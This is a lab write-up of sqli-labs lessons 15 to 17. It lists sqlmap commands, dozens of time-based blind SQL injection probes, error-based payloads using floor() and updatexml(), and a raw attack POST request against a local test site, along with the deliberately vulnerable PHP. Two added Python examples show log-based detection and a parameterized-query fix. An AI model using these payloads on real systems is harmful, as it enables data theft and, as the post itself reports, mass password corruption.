
【MySQL SQL injection】【Beginner series】Using sqli-labs, part 3【15-17】

2016-06-04 04:28
Less-15- Blind- Boolean Based- String

1) Tool usage:

sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-15/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BEST


2) Manual injection

I gave up doing the time-based blind injection by hand; the statements here are taken from sqlmap's test queries.

User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>96,0,3)))))sIak) AND 'MEep'='MEepPassword:111
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>112,0,3)))))sIak) AND 'MEep'='MEepPassword:111
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>120,0,3)))))sIak) AND 'MEep'='MEepPassword:111
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116,0,3)))))sIak) AND 'MEep'='MEepPassword:111
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>114,0,3)))))sIak) AND 'MEep'='MEepPassword:111
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>115,0,3)))))sIak) AND 'MEep'='MEepPassword:111
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))!=115,0,3)))))sIak) AND 'MEep'='MEepPassword:111
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>64,0,3)))))sIak) AND 'MEep'='MEepPassword:111
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>96,0,3)))))sIak) AND 'MEep'='MEepPassword:111
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>112,0,3)))))sIak) AND 'MEep'='MEepPassword:111
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>120,0,3)))))sIak) AND 'MEep'='MEepPassword:111
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>116,0,3)))))sIak) AND 'MEep'='MEepPassword:111


3) Code that creates the injection point

if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
// The user name is written without a trailing newline, which is why
// "Password:" is fused onto the same line in the result.txt excerpt above.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname);
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
// Both POST values are interpolated unescaped into single-quoted string
// literals: this is the injection point.
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
// (remainder of the handler not shown on the page)
}


Less-16- Blind- Time Based- Double quotes- String

1) Tool usage:

sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-16/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BEST --risk 3 --level 5


2) Manual injection

I gave up doing the time-based blind injection by hand; the statements here are taken from sqlmap's test queries.

User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>120,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>114,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>115,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))!=115,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>104,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>100,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>102,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>101,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))!=101,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>104,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>100,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>98,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>99,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))!=99,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>120,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>116,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>118,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))>117,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))!=117,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>120,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>116,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>114,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))>113,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))!=114,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>104,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>108,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>106,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))>105,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))!=105,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>120,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>116,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>114,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))>115,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))!=116,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>96,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>120,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>124,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>122,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))>121,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))!=121,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>64,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>32,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>16,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>8,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>4,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>2,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>1,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111


3) Code that creates the injection point

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
// Each value is wrapped in double quotes and then in parentheses, which is
// why the logged sqlmap probes above start with ") to close both.
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
// Still plain string interpolation with no escaping: the injection point.
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
// (remainder of the handler not shown on the page)
}
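The result.txt excerpts for Less-15 and Less-16 above are exactly what a defender is left with after the fact. As an added example that is not part of the original post or of sqli-labs, the following Python script parses that log layout (including the Less-15 case where the user name and password are fused on one line), flags records carrying time-based or error-based signatures, and rebuilds what the character-by-character search confirmed from the "!=" probes, since sqlmap ends each position's binary search with one of those against the single remaining value. The embedded log lines are constructed from the probes shown on the page, and the function and regex names are my own.

```python
import re

# Constructed sample of what sqli-labs appends to result.txt.  The first record
# uses the Less-15 layout (no newline after the user name, so "Password:" is
# fused onto the same line); the others use the Less-16/17 layout with the
# password on its own line.  Payloads are copies of the sqlmap probes shown on
# the page, with each position's binary search trimmed to its "!=" confirmation.
SAMPLE_LOG = """\
User Name:111' AND (SELECT * FROM (SELECT(SLEEP(3-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>96,0,3)))))sIak) AND 'MEep'='MEepPassword:111
User Name:Dumb
Password:Dumb
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>112,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))!=115,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))!=101,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))!=99,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),4,1))!=117,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),5,1))!=114,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1))!=105,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),7,1))!=116,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),8,1))!=121,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:") AND (SELECT * FROM (SELECT(SLEEP(2-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),9,1))>1,0,2)))))cLMQ) AND ("rwXh"="rwXh
Password:111
User Name:admin1
New Password:' and updatexml(1,concat(0x7e,(select database())),1)#
"""

# A "User Name:" line may carry the password on the same line (Less-15 layout).
RECORD_RE = re.compile(r"^User Name:(?P<uname>.*?)(?:Password:(?P<passwd>.*))?$")
PASSWORD_RE = re.compile(r"^(?:New )?Password:(?P<passwd>.*)$")
TIME_BASED = re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)
ERROR_BASED = re.compile(r"\b(?:UPDATEXML|EXTRACTVALUE)\s*\(|\bFLOOR\s*\(\s*RAND\s*\(", re.I)
# One sqlmap character probe: MID(<expr>,<pos>,1)) followed by ">n" or "!=n".
PROBE = re.compile(r"MID\((?P<expr>.+?),(?P<pos>\d+),1\)\)\s*(?P<op>!=|>)\s*(?P<val>\d+)", re.I)


def parse_records(text):
    """Pair every 'User Name:' entry with its password, fused or on the next line."""
    records, pending = [], None
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if m:
            if pending is not None:  # previous record never got a password line
                records.append((pending, ""))
            if m.group("passwd") is not None:
                records.append((m.group("uname"), m.group("passwd")))
                pending = None
            else:
                pending = m.group("uname")
            continue
        p = PASSWORD_RE.match(line)
        if p and pending is not None:
            records.append((pending, p.group("passwd")))
            pending = None
    if pending is not None:
        records.append((pending, ""))
    return records


def classify(value):
    """Signature tags for one submitted field."""
    tags = []
    if TIME_BASED.search(value):
        tags.append("time-based")
    if ERROR_BASED.search(value):
        tags.append("error-based")
    return tags


def reconstruct_exfiltrated(records):
    """Map each probed expression to the string its '!=' confirmations spell out."""
    found = {}
    for uname, passwd in records:
        for field in (uname, passwd):
            for m in PROBE.finditer(field):
                if m.group("op") == "!=":
                    chars = found.setdefault(m.group("expr"), {})
                    chars[int(m.group("pos"))] = chr(int(m.group("val")))
    return {expr: "".join(ch for _, ch in sorted(chars.items()))
            for expr, chars in found.items()}


def analyze(text):
    records = parse_records(text)
    flagged = [(i, classify(u) + classify(p)) for i, (u, p) in enumerate(records)
               if classify(u) or classify(p)]
    return {"records": len(records), "flagged": flagged,
            "exfiltrated": reconstruct_exfiltrated(records)}


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

Run against the constructed log this reports 13 records, 12 of them flagged, and recovers "security" for the DATABASE() expression, which matches the database the post names in the Less-17 notes; the ">" probes alone carry no answer because the server's response time, not the log, decided each branch.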


Less-17 Update Query- Error based - String

1) Tool usage:

Lessons learned: here I only managed to get sqlmap to inject successfully after logging in. The account and password used were: Dumb

One unreliable aspect: with UPDATE-based injection, a careless input can unintentionally modify other legitimate users' password data; looking at the USER table under the security database, I found that every user's password had been changed to 0...

Tool command usage:

sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-17/index.php" --data "uname=Dumb&passwd=Dumb&submit=Submit" --current-db --batch --threads 10


2) Manual injection

Note: in this level the username is passed through a filtering function, so the actual injection point is passwd;

There are two error-based injection methods: one uses a floor()-based error statement, the other uses updatexml();

The floor()-based error statement is as follows (the injection statement used by sqlmap):

User Name:'Dumb'
New Password:Dumb' AND (SELECT 8824 FROM(SELECT COUNT(*),CONCAT(0x716a6b7671,(statement),0x716b7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'noKL'='noKL


Using updatexml(), the manual injection statement is as follows:

POST /hacker/sqli-labs-master/Less-17/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88

uname=admin1&passwd=' and updatexml(1,concat(0x7e,(select database())),1)#&submit=Submit


3) Code that creates the injection point

function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
// passwd is taken as-is: it never goes through check_input()
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);
// connectivity
// $uname is already quoted and escaped by check_input(), so this SELECT is not
// the weak spot.
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '<font color= "#0000ff">';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
// The unescaped $passwd is interpolated straight into the UPDATE: this is the
// injection point the error-based payloads above go through.
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";
// (remainder of the handler not shown on the page)
}
}
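The Less-17 code above escapes uname through check_input() but splices $passwd straight into the UPDATE string. As an added example, not code from the page or from sqli-labs, the following Python uses an in-memory SQLite database (standing in for MySQL, so updatexml() does not exist there) to push the page's captured passwd value through both a string-built UPDATE of the same shape and a parameterized one: the first fails with a database error, which is the channel error-based injection reads from, while the second stores the text verbatim as a password and touches only the intended row. The table contents and function names are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the sqli-labs users table (not the real seed data).
SEED_USERS = [("Dumb", "Dumb"), ("admin1", "admin1"), ("admin2", "admin2")]

# The passwd value from the captured Less-17 request shown on the page.
PAGE_PAYLOAD = "' and updatexml(1,concat(0x7e,(select database())),1)#"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    conn.commit()
    return conn


def build_vulnerable_update(username, new_password):
    # Same shape as the page's $update: the new password lands inside the SQL text.
    return "UPDATE users SET password = '%s' WHERE username='%s'" % (new_password, username)


def update_vulnerable(conn, username, new_password):
    """Returns (rows_changed, error_text).  Whatever the database says about a
    broken statement is what an error-based probe would read back if the
    application echoes it to the client."""
    try:
        cur = conn.execute(build_vulnerable_update(username, new_password))
        conn.commit()
        return cur.rowcount, None
    except sqlite3.Error as exc:
        return 0, str(exc)


def update_safe(conn, username, new_password):
    """Parameterized form: the value is bound, never parsed as SQL."""
    cur = conn.execute("UPDATE users SET password = ? WHERE username = ?",
                       (new_password, username))
    conn.commit()
    return cur.rowcount


def get_password(conn, username):
    row = conn.execute("SELECT password FROM users WHERE username = ?",
                       (username,)).fetchone()
    return row[0] if row else None


def demo(payload=PAGE_PAYLOAD):
    conn = make_db()
    vuln_rows, vuln_err = update_vulnerable(conn, "admin1", payload)
    safe_rows = update_safe(conn, "admin1", payload)
    return {
        "vulnerable_sql": build_vulnerable_update("admin1", payload),
        "vulnerable_rows": vuln_rows,
        "vulnerable_error": vuln_err,
        "safe_rows": safe_rows,
        "stored_password": get_password(conn, "admin1"),
        "untouched": get_password(conn, "admin2"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-17s %r" % (key + ":", value))
```

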